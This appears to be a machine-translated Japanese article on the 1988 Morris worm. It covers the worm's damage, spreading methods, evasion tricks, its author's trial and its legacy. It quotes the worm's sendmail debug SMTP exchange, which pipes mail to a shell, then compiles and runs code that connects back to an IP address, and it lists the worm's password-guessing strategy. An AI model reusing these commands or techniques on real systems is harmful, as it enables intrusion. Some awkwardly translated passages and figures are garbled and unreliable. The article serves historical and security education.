モリスワーム-彼は最初だった

1988年11月2日、ARPANETネットワークは、後にその作成者であるコーネル大学の学生Robert Morris Jrにちなんで名付けられたプログラムMorris Wormに攻撃されました。 ARPANET（Advanced Research Projects Agency Network）は、1969年に米国国防総省（DARPA、Defense Advanced Research Projects Agency）の高等研究部のイニシアチブで作成され、インターネットのプロトタイプでした。 このネットワークは、米国国防総省（DoD、国防総省）の利益のために活動する最大の研究センター、研究所、大学、政府組織、民間企業間のプログラムおよびデータ配列だけでなく、メッセージングのためのコンピューターエンジニアリングおよびテクノロジーの分野の研究者の利益のために作成されましたアメリカ）。 OSIモデルの最も一般的な3つのトランスポート層プロトコルの1つであるTCP / IPが開発されたのはDoDの命令であり、1983年にARPANETの主要なプロトコルになりました。 80年代の終わりまでに、ネットワークは合計数万台のコンピューターになりました。 ARPANETは1990年6月に存在しなくなりました。

「Morris Worm」は、ネットワークを介した自動配布メカニズムを使用したコンピューター技術の開発の歴史におけるマルウェアの最初の例でした。 これを行うために、ネットワークサービスのいくつかの脆弱性と、当時のセキュリティ問題への不十分な注意によるコンピュータシステムの脆弱性が使用されました。



ロバートモリスによると、このワームは研究目的で作成されたものです。 そのコードには「ペイロード」（破壊的な機能）は含まれていませんでした。 それにもかかわらず、操作アルゴリズムのエラーにより、ワームの拡散は、コンピュータがワームの多数のコピーの作成に忙しく、オペレータのコマンドへの応答を停止したときに、いわゆる「サービス拒否」を引き起こしました。 Morris Wormは、ARPANETネットワーク上のコンピューターの操作を最大5日間実質的に麻痺させました。 ダウンタイムの評価-システムの復元に費やされた少なくとも800万時間と100万時間以上。 金銭面での総損失は98百万ドルと推定され、それらは直接および間接の損失に相当します。

含まれている直接損失（3200万ドル）：

42700マシンの停止、テスト、および再起動。

6200マシンのワームの識別、削除、メモリのクリーニング、および健全性の回復。

ワームコードの分析、分解、文書化。

Unixシステムの修復とテスト。

間接的な損失が含まれています（6600万ドル）：

ネットワークへのアクセス不足によるコンピューター時間の損失。

ネットワークへのユーザーアクセスの損失。

ただし、これらの見積もりは非常に慎重に行う必要があります。

構造的に、ワームは「頭」と「尾」の3つの部分で構成されていました。 「ヘッド」はCソースコード（99行）で、リモートマシンで直接コンパイルされました。 「テール」は、ソースコードとアルゴリズム、バイナリファイルの点では同一でしたが、異なるタイプのアーキテクチャ用にコンパイルされていました。 Morrisによると、VAXとSUNがターゲットハードウェアプラットフォームとして選択されました。 「ヘッド」は、次の方法を使用してキャストされました。

• sendmailでのデバッグモードの使用。
• fingerdネットワークサービスのバッファオーバーフロー脆弱性の悪用。
• プログラムのリモート実行のためのログインとパスワードの選択（rexec）;
• ユーザー名とパスワードを選択するか、信頼メカニズムを使用して、リモートシェル（rsh）を呼び出します。

Sendmailは、メールの受信とSMTP経由の送信を処理する最も古いネットワークサービスです。 ワームの拡散中に、Sendmailには文書化されていない機能がありました。開発者は、プログラムの実際のバージョンではないはずのデバッグモードをプログラムし、誤って放置されました。 デバッグモードの機能の1つは、メールメッセージがSendmail自体ではなく、別のプログラムによって処理されたことです。 ワームによって送信されたメッセージの例：

デバッグ

からのメール：</ dev / null>

rcptto：<"| sed-e '1、/ ^ $ / d' | / bin / sh; exit 0">

データ

cd / usr / tmp

cat> x14481910.s、<<「EOF」

<プログラムテキストl1.c>

Eof

cc -o x14481910 x14481910.s; x14481910 128.32.134.16 32341 8712440; rm -f x14481910 x14481910.c

。

やめる

ご覧のとおり、ヘッダーはレターの本文から削除され（sedテキストプリプロセッサを使用）、「ヘッド」ソースコードファイルが保存されました。 さらに、コマンドプロセッサには、「ヘッド」コードをコンパイルし、結果の実行可能ファイルを起動し、一時ファイルを消去する指示が与えられました。

fingerdサービスの脆弱性を悪用するために、ワームは特別に準備された536バイトの文字列を送信し、最終的にexecve関数（ "/ bin / sh"、0、0）を呼び出しました。 これは4.3BSD OSがインストールされたVAXコンピューターでのみ機能し、SunOSベースのSUNコンピューターではこの脆弱性は見つかりませんでした。

rexecおよびrshによる配布方法を使用するために、ローカルマシン上のユーザーのリストが収集されました。 これに基づいて、多くのユーザーがネットワーク上のすべてのマシンで同じ名前とパスワードを持っていることを期待して、最も頻繁に使用されるパスワードが選択されましたが、真実からそれほど遠くないことが判明しました。 rshでの選択に加えて、信頼メカニズム、またはリモートマシンのIPアドレスによる簡易認証のための別のメカニズムが使用されました。 このようなアドレスは/etc/hosts.equivおよび.rhostsファイルに保存されていました。 ほとんどのコンピューターでは、信頼関係は相互であったため、ワームによって検出されたこれらのファイルのIPアドレスのリストにより、パスワードを使用せずにrshを介してリモートシステムにログインすることが可能になりました。

ワームを選択するときに、次のパスワードオプションを試しました。

• 空っぽ
• ユーザー名（ユーザー）;
• 逆ユーザー名（resu）;
• 重複ユーザー名（useruser）;
• ユーザーの姓または名（John、Smith）;
• 小文字のユーザー名または姓（john、smith）。
• 432語の組み込み辞書。
• file / usr / dict / words、約24,000語を含み、4.3BSDシステム（およびその他）でスペル辞書として使用されます。 単語が大文字で始まる場合、小文字のバリアントもチェックされました。

いくつかの配布方法を組み合わせて使用​​すると、ネットワーク上のワームの大量配布に大きな影響を与えています。 リモートコンピューターを検索するために、ルートテーブルの情報と感染したシステムの自身のIPアドレスに基づいてネットワークスキャンが実行されました。

ワームは、コンピューター管理者がそれを検出するのを困難にするために、いくつかのトリックを使用しました。

• 起動後に実行可能ファイルを削除します。
• すべてのエラーメッセージが無効になり、クラッシュダンプのサイズがゼロに設定されました。
• ワームの実行可能ファイルはshという名前で保存され、同じ名前がBourne Shellシェルで使用されたため、ワームはプロセスのリストでマスクされました。
• 約3分ごとに子スレッドが生成され、親が終了しましたが、ワームプロセスのpidは絶えず変化し、プロセスリストに表示される実行時間はリセットされました。
• すべてのテキスト文字列は、xor 81h操作を使用してエンコードされました。

アイデアの「壮大さ」にもかかわらず、このワームには設計と実装の両方でいくつかのエラーがありました。 これは、システムが既に感染しているかどうかをチェックするために誤って実装されたアルゴリズムであり、そのため、作成者の考えに反して、ネットワーク上でワームが大量に配布されました。 実際には、コンピューターは複数回感染しました。これは、第一に、リソースの急速な枯渇につながり、第二に、ネットワーク上での雪崩のようなワームの拡散に貢献しました。 いくつかの推定によると、Morrisワームは約6,200台のコンピューターに感染しました。 開発者自身は、彼の行為の結果の規模を認識し、自発的に当局に降伏し、すべてについて話しました。 彼の事件に関する審理は1990年1月22日に終了しました。 当初、モリスは最高5年の懲役と25,000ドルの罰金に直面していました。 実際、判決はかなり穏やかで、裁判所は400時間のコミュニティサービス、1万ドルの罰金、3年間の試用期間、および囚人の監視に関連する費用の支払いを命じました。

Morris Wormの事件により、IT専門家はセキュリティの問題について真剣に考えました。特にその後、システムのセキュリティを強化するために、誤ったパスワードの入力後、一時停止が導入されました。 / etc / passwdファイルのすべてのユーザー。 しかし、最も重要なイベントは1988年11月のCERT Coordination Center（CERT / CC）の作成であり、その活動はインターネットセキュリティ問題の解決に関連しています。 1988年12月に最初に登場したCERTセキュリティ速報は、ワームによって悪用された脆弱性の報告でした。 Morrisワームで使用される技術的なソリューションの多くは、パスワード推測の使用、* NIXシステム（Slapper）を実行しているリモートコンピューターでのブートローダーコードのコンパイル、ネットワークをスキャンしてターゲットを検出するなどです。 また、最新のマルウェアサンプルでも使用されています。

興味深いことに、同じ1988年、有名なプログラマーであるピーター・ノートンは、コンピューターウイルスの存在の事実に反対してマスコミでかなり鋭く話し、それらを「神話」と呼び、このトピックに関するノイズを「ニューヨークの下水道に住んでいるワニの話」と比較しました。 ノートンの声明のわずか2年後の1990年に、ノートンアンチウイルスアンチウイルスプログラムの最初のバージョンがリリースされました。

そして最後に-1988年、Morrisワームの攻撃に感銘を受けて、American Computer Equipment Associationは11月30日を国際情報セキュリティの日として宣言しました。